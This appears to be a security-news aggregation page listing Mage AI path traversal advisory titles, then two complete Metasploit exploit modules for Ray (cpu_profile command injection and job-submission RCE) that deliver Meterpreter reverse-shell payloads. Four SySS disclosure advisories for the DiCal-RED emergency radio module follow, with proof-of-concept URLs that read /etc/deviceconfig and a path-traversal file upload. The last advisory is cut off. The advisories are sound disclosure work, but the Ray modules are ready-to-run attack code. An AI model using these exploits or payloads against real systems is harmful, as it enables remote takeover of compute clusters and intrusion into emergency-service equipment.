Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Pipeline Interaction" request

**Mage AI Path Traversal vulnerability**

Moderate severity GitHub Reviewed Published Aug 23, 2024 to the GitHub Advisory Database • Updated Aug 23, 2024

GHSA-4mrc-w7jh-hx4j: Mage AI Path Traversal vulnerability

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "File Content" request

GHSA-v9wr-8wrm-h6p7: Mage AI Path Traversal vulnerability

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request

GHSA-cgxv-795x-3vqr: Mage AI Path Traversal vulnerability

This Metasploit module demonstrates a command injection vulnerability in Ray via cpu_profile.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ray cpu_profile command injection',        'Description' => %q{          Ray RCE via cpu_profile command injection vulnerability.        },        'Author' => [          'sierrabearchell',                      # Vulnerability discovery          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module          'Takahiro Yokoyama'                     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-6019'],          ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],        ],        'CmdStagerFlavor' => %i[wget],        'Payload' => {          'DisableNops' => true        },        'Platform' => %w[linux],        'Targets' => [          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-11-15',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8265),      ]    )  end  def get_nodes    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')    })    return unless res && res.code == 200    JSON.parse(res.body)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/version')    })    return Exploit::CheckCode::Unknown unless res && res.code == 200    ray_version = res.get_json_document['ray_version']    return Exploit::CheckCode::Unknown unless ray_version    ray_version = Rex::Version.new(ray_version)    return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3')    @nodes = get_nodes    return Exploit::CheckCode::Vulnerable unless @nodes.nil?    Exploit::CheckCode::Appears  end  def exploit    # We need to pass valid node info to /worker/cpu_profile for the server to process the request    # First we list all nodes and grab the pid and ip of the first one (could be any)    @nodes ||= get_nodes    fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes    first_node = @nodes['data']['summary'].first    fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')    pid = first_node['agent']['pid']    fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')    ip = first_node['ip']    print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")    case target['Type']    when :nix_cmd      execute_command(payload.encoded, { pid: pid, ip: ip })    else      execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })    end  end  def execute_command(cmd, opts = {})    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),      'vars_get' => {        'pid' => opts[:pid],        'ip' => opts[:ip],        'duration' => 5,        'native' => 0,        'format' => "`#{cmd}`"      }    })  endend

Ray cpu_profile Command Injection

This Metasploit modules demonstrates remote code execution in Ray via the agent job submission endpoint. This is intended functionality as Ray's main purpose is executing arbitrary workloads. By default Ray has no authentication.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ray Agent Job RCE',        'Description' => %q{          RCE in Ray via the agent job submission endpoint.          This is intended functionality as Ray's main purpose is executing arbitrary workloads.          By default Ray has no authentication.        },        'Author' => [          'sierrabearchell',                      # Vulnerability discovery          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module          'Takahiro Yokoyama'                     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-48022'],          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],          ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']        ],        'CmdStagerFlavor' => %i[wget],        'Payload' => {          'DisableNops' => true        },        'Platform' => %w[linux],        'Targets' => [          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'MeterpreterTryToFork' => true              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-11-15',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8265),      ]    )  end  def get_job_data(cmd)    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/jobs/'),      'data' => { 'entrypoint' => cmd }.to_json    })    unless res && res.code == 200      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),        'data' => { 'entrypoint' => cmd }.to_json      })    end    return unless res && res.code == 200    JSON.parse(res.body)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/version')    })    return Exploit::CheckCode::Unknown unless res && res.code == 200    ray_version = res.get_json_document['ray_version']    return Exploit::CheckCode::Unknown unless ray_version    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')    @job_data = get_job_data('ls')    return Exploit::CheckCode::Vulnerable unless @job_data.nil?    Exploit::CheckCode::Appears  end  def exploit    @job_data ||= get_job_data('ls')    if @job_data      print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")    end    case target['Type']    when :nix_cmd      execute_command(payload.encoded)    else      execute_cmdstager({ flavor: :wget })    end  end  def execute_command(cmd, _opts = {})    get_job_data(cmd)  endend

Ray Agent Job Remote Code Execution

DiCal-RED version 4009 provides a network server on TCP port 2101. This service does not seem to process any input, but it regularly sends data to connected clients. This includes operation messages when they are processed by the device. An unauthenticated attacker can therefore gain information about current emergency situations and possibly also emergency vehicle positions or routes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-042  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36441  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to missing authentication checks, the device is vulnerable to the  
disclosure of sensitive information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device provides a network server on TCP port 2101. This service does not  
seem to process any input, but it regularly sends data to connected clients.  
This includes operation messages when they are processed by the device.  
An unauthenticated attacker can therefore gain information about current  
emergency situations and possibly also emergency vehicle positions or routes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

$ telnet <IP or hostname> 2101  
[Wait ...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-042  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-042.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd  
i5ZG5RAAgQx1MolkOvk+4nbY4vXjd6bkqa+9e0v1vw8Yu+9Mmb7AhLqz9sHSpe/Y  
bSGnVJowj57irXIYAjuAjXnczRuRVFgOZY+CS3+8aIi0uJ/xuaJh7OSBY6WKDMG1  
S9voYYQ0QJBWxRBX/e+isTKag+XAAG3rBM9/B8S/kQOMXk+ikId0/l4iLici6MEg  
QxRRVOKBgq55zMePg9s42R+M14r+QtMm/8DV6syleaJfYMj/mAq1YDfqVaJms60j  
N2zb6dhlbnaz0xODV9Pjss3X7VvOgiHXtXTCU2CGlYIupNXAtbr0O5MZPGzrjeES  
CrvTfn2SidvxWIJ8n9ldVdL9vImikOdZ5KWrZsaUIdVaSYumyyKNFuW4dbgsd206  
wXU04AH82azCa9uGybCNQwjuvLLReN9H2/hZS865FIf9JD46qyV7fcSbu70kOmbb  
u8mljYWV5cLUEmURj/K9IgSKueyHlVk8hR+seYP7KgYA3zpegbiuaMabLetPgqOT  
j9eleo1AOeDeNqpVoBAwEA2qZ2N1LI2IfrA3ZTXWIO6qMU/r40551/3wd6TC7Fa4  
rypR9+7J371kSRn/eLYTOOqrnlteFOdcEPQbz3r/5wUWmIuNgcR/ipzPrZKsvaPb  
oXqB3PkjDORrKfXpBtT6oHmv7C0wRhZJgbeIhk7IYyfl8lebLps=  
=zVD2  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Information Disclosure

DiCal-RED version 4009 makes use of unmaintained third party components with their own vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-041  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Use of Unmaintained Third Party Components (CWE-1104)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2016-5195, CVE-2016-7406, CVE-2019-12815 and others  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to the use of unmaintained third-party software components, the device is  
vulnerable to numerous known security issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device's operating system is based on several well-known open-source  
products, such as the Linux kernel, the Dropbear SSH server and the  
ProFTPD FTP server.

In particular, it runs the following versions:

 Product      | Version | Released  
 -------------|---------|--------------  
 Linux kernel | 3.14.35 | March 2015  
 Dropbear     | 2013.56 | March 2013  
 ProFTPD      |  1.3.3g | November 2011

There are several publicly known security issues that affect these software  
versions, such as CVE-2016-5195, CVE-2016-7406 or CVE-2019-12815.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

None

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-041  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-041.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd  
i5bc5A//bNGaYSQgB48TQes7HlvC5hsYWgtFZU6xdI+V6SEkeGkMGAPfItRDjgAt  
fUxbP+UZbjkgBZuHk5wJJYFWYEHE7a+PFJW7JC3kwioVqanrxzlST/PCCIyxNFZR  
Jy/bwC0EkE5xsyDrOmMbfBAOicObLChmXw7XuN5ec14VUPNjrBL++iYH2Y694ZnC  
sP+sxD7g2QDxTllHkpIcWVZN0T/hH3RHOS5SM0Kv8SfDln38lOSuPbMkr/V/wmpG  
FWpjgYWjtSLFQwozJWxEbp/X6/nwxTIRM1/kTgjNeBZDa74mIGPdxPLDKXYlytI6  
/Wrj6PjN+UjA6fbxb+LvYdtx/xQ98gPj5k84/qlQ8fNO24bSq3VUOcoATm640TtM  
9MEjr38rF/FPksufef1gj45m9/HgnPSeXyVkf5XZR6ipb9Mc+elpO7f+YivY5wfB  
DOuEiYaCJsQL+7KZrVR2c3+4rVTQOiUOzRT8QUPu0//naHfLDtq0DRAlRJQHzIiY  
2xqJPvs4XcmctsokqvbHGikPROEU36cJSBKdSqrorLmC6EU0fPF4c3EzGVSRkHpT  
LOhIjACUWteOLjh3BJhXAobS1jIwS73HUFO+Vr1RT54lhrmXlWIW8WrexDrdA9mz  
ALGeZDjb5uH8Y4DQ5oWOXVbK8eSFAJc/FRRDMRHsiAMWWozOBik=  
=R39e  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Outdated Third Party Components

DiCal-RED version 4009 is vulnerable to unauthorized log access and other files on the device's file system due to improper authentication checks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-040  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Improper Authentication (CWE-287)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36444  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to improper authentication checks, the device is vulnerable to  
unauthorized access to logs and other files on the device's file system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device allows viewing log files via the administrative web interface.  
This function does not require an authenticated session.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As other parts of the administrative web interface do require authentication,  
a simple proof of concept is to log in to the web interface and navigate to  
the function to view log files.  
Log file contents are returned by a URL similar to  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22%22,%22FileAlias%22:%22FdmDebugPath%22,%22LinesMax%22:0}

Using a local proxy to remove the QSESSIONID cookie from this request shows  
that the content is also returned when not sending any session information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-040  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-040.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5ZgGw/9GlpK9ZCfsFYDOaonfqTm0zPxu1CURL4gT2gnmcWKnvZMnSBVtI2qolR/  
oyp8GMhBkQ5i1msTZXCBFTQfmxAjniNZ4hpg9nxY/9q7uThu8td2A89Ge9+qP7u0  
06Z52kYGhMK+C5Ecoww9pOjNtL233B6300kSxxBh4wspAUw8NdOtnBO9zTiU8zcw  
MPjPsoHNofn6Ah1BRw40vkPTDGoKE9wD17nNJn0lnpgvP03ZLgEErk4gkvK0L1ts  
N33g1R0k2M3vKzhid9FUFE+OEFN4NdkmTUqylGU9uLEhtSZiZ5CT1kAcNp6PUOlA  
EmNqudfLngHVhyfTAVXhbJV8C/I9tCiktPiPD3g4sAP5FwsmnfKXvwULCABV7Y6I  
6szsx1JPojyaYTi0hGKviJjewyEld9p7qLuCDt/Hq6BqkxaZkAN1JuyuqMLQDw8k  
ghIBzdqxCpaoa3r43Cg6mpiNzhe9cRYHDDSQ5wl+5nKI4NDy7xxaQd8psyg5CjCP  
CxgJTHne5zvFhtZP7LFa82R3Yux6x6k2XcxbsgoBaBYXS9Qj+QKLU5HxbZVbVwWS  
c0kZzHWWydiaqSfXl5OZDPZIcOZH3C95kXFY78XMOhndqg9yW7ot3OJ/RR5GfX1X  
jqcbLv9k0XCRr55bH/vcLWoJw9oGxfX25FlH2Sp7VYiaIohd8cM=  
=Iaf1  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Log Disclosure

DiCal-RED version 4009 has an administrative web interface that is vulnerable to path traversal attacks in several places. The functions to download or display log files can be used to access arbitrary files on the device's file system. The upload function for new license files can be used to write files anywhere on the device's file system - possibly overwriting important system configuration files, binaries or scripts. Replacing files that are executed during system operation results in a full compromise of the whole device.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-039  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36442  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to a path traversal issue, the device is vulnerable to the disclosure  
of arbitrary files and modification of system files, effectively leading to  
remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The administrative web interface of the device is vulnerable to path traversal  
attacks in several places.

The functions to download or display log files can be used to access arbitrary  
files on the device's file system.  
The upload function for new license files can be used to write files anywhere  
on the device's file system - possibly overwriting important system  
configuration files, binaries or scripts.  
Replacing files that are executed during system operation results in a full  
compromise of the whole device.

Note that the attacker needs to be authenticated in order to exploit these  
vulnerabilities, i.e. know the administrative system password or its MD5  
hash (cf. SYSS-2024-038).  
However, due to another vulnerability (cf. SYSS-2024-040), authentication is  
not required to display file contents.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An attacker can download the file /etc/deviceconfig via the following URL:  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}

Alternatively, the same file can be viewed via  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}

The following HTTP POST request uploads a file to the root directory (/) of  
the device's file system:

 POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1  
 Host: 192.0.2.1  
 Content-Length: 190  
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5  
 [...]  
 Cookie: QSESSIONID=[...]

  ------WebKitFormBoundarynMcoPJ7jKTghQbK5  
 Content-Disposition: form-data; name="binary"; filename="../poc.txt"  
 Content-Type: text/plain

  PoC

  ------WebKitFormBoundarynMcoPJ7jKTghQbK5--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-039  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
